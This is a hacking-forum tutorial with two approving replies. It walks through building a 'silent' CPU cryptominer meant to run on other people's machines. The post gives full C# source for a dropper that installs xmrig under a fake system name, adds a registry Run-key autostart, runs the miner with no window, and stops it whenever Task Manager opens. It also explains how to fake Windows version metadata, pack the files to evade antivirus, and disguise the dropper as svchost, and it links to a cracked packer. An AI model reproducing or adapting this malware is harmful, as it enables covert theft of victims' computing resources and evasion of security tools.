ALERT!
Click here to register with a few steps and explore all our cool stuff we have to offer!
Home
Upgrade
Credits
Help
Search
Awards
Achievements
 2499

How to create your own silent CPU miner in 30 min

by nyx - 02-18-2018 - 02:48 AM
#1
For a better understanding of the following code, you need basic knowledge in C #!
Let's start:

Download the latest version of Xmrig's style (github.com/xmrig/xmrig/releases).
Next we need only xmrig.exe

[Image: qf7yaYRxRSC3qokicuqt9Q.png]

Download and install Resource Hacker (angusj.com/resourcehacker/#download)

Go to the directory C:\Windows\System32, select any dll and open with Resource Hacker.
Next, copy the text from Version Info

[Image: BnUtqhFNRuWXRAtFXRoYwA.png]

[Image: fgG6wufARQCCeBtSze05_A.png]

Press on button Compile

[Image: ablJyH9rSgqUHUXZyakgwA.png]

Press Ctrl + S to save everything
There are 2 files xmrig.exe and xmrig_original.exe, the second we no longer come in handy
Then we need to crypt somehow our file if you have no money to buy private crypt just google VMProtector and try to crypt it with this programm. Should help at least to FUD 1 - 5 /36

The miner is ready!

[Image: y9_Sjs4cTfWLSARWv1S1og.png]

Now you need to make a bot that will open and close the miner.
In Visual Studio, we create a new console application C #

[Image: qVmKL3AURm_8bUGj5omuNg.png]

Go to Project -> Properties ..., in the Application section, change the Output type to Windows Application

[Image: ay8CYmYTSMWBQUIKqChjJA.png]

In the Resources section, add our miner - MSASCuiL

[Image: muEH9EyKQ5uSAgcJeUUWhg.png]

Thus, we make our program invisible and add the miner to the resources
Then paste the following code:

Code:
using Microsoft.Win32;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Threading;

namespace ConsoleApp4
{
    class Program
    {

        static string direct = @"C:\TEST2"; //Путь к папке, где будут храниться все файлы
        static string _filename = "MSASCuiL"; //Название майнера
        static string proc = "50";//нагрузка на CPU
        static string pool = "stratum+tcp://miner.xyz:3333"; // Pool
        static string user = "123"; //User
 



        static string filename = _filename+".exe";
        static string exeToRun = direct + @"\" + filename;
        const string name = "HdDriver";

        static string ExePath = "";

        static void Main(string[] args)
        {


    
            Install(); //Копируем файлы Майнера в папку
            CopyFile(); //Копируем файлы бота в папку
            SetAutorunValue(true);//Делаем автозапуск (взяв  з https://lolzteam.net/threads/345524/)
            StartMine(); //Запускаем майнер
            while (true) //Мониторим процессы, если диспетчер задач открытый закрываем майнер
            {
                int con = 0;
                Process[] procs = Process.GetProcesses();
                foreach (Process p in procs)
                {
                    if (p.ProcessName == "Taskmgr")
                    {
                        Process[] miner = Process.GetProcessesByName(_filename);
                        if (miner.Length > 0)
                        {
                            miner[0].Kill();

                        }



                        con++;

                    }



                }
                if (con == 0)
                {
                    Process[] miner1 = Process.GetProcessesByName(_filename);
                    if (miner1.Length == 0)
                    {
                        StartMine();
                    }
                }
                Thread.Sleep(500);
            }




        }
        private static void StartMine()
        {
            Process run = new Process();
            run.StartInfo.Arguments = $" --max-cpu-usage={proc} --donate-level=1 -o {pool} -u {user} ";
            run.StartInfo.FileName = exeToRun;
            run.StartInfo.RedirectStandardOutput = true;
            run.StartInfo.UseShellExecute = false;
            run.StartInfo.CreateNoWindow = true;
            run.Start();


        }
        public static void CopyFile()
        {
            if (!File.Exists(direct+@"\"+"svhost.exe"))
            {
                string filePath = Assembly.GetExecutingAssembly().Location;
                File.Copy(filePath, direct + @"\" + "svhost.exe");
            }
        }
        public static bool SetAutorunValue(bool autorun)
        {
            if(!File.Exists(direct + @"\" + "svhost.exe"))
            {
                 ExePath = Assembly.GetExecutingAssembly().Location;
            }
            else
            {
                 ExePath = direct + @"\" + "svhost.exe";
            }
        
    
            RegistryKey reg;
            reg = Registry.CurrentUser.CreateSubKey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");
            try
            {
                if (autorun)
                    reg.SetValue(name, ExePath);
                else
                    reg.DeleteValue(name);

                reg.Close();
            }
            catch
            {
                return false;
            }
            return true;
        }
        private static void Install()
        {
            byte[] exeBytes = Properties.Resources.MSASCuiL;

    
      
 if (!Directory.Exists(direct))
            {
                Directory.CreateDirectory(direct);
             
            }
            if (!File.Exists(exeToRun))
            {
                using (FileStream exeFile = new FileStream(exeToRun, FileMode.Create))
                {
                    exeFile.Write(exeBytes, 0, exeBytes.Length);
                }
            }

        }
    }
}

Change the settings to your
We compile our program and do the same with it as c xmrig (change Version Info)
Since this is a NET program I recommend using NET Reactor

My settings:

[Image: Y01x3BtFT52pCa2UdJpNrA.png]

It is better to name the file svhost and do not change the icon so that the file is not highlighted through other processes svhost
ALL IS READY!!!
In the end we get the file svchost
If you start it in folder, it ll drop 2 files and start the mining
If you open the task manager, the mining will stop

[Image: bjbm9U97QgeYHULoRcR0Uw.png]

Detect svhost - https://nodistribute.com/result/GZfSC9vh...5uKkcUrXHP

Detect MSASCuiL - https://nodistribute.com/result/pG8eDqwBVjJWY2AuXk5Sny

Link to NET Reactor:
https://files.catbox.moe/u8ibxh.zip
Pass to archive: lzt
VT: https://www.virustotal.com/#/file/1efc53.../detection
Reply
#2
Pretty good, thanks bro
Reply
#3
Looks cool, I may try this.
Reply

Users browsing: 1 Guest(s)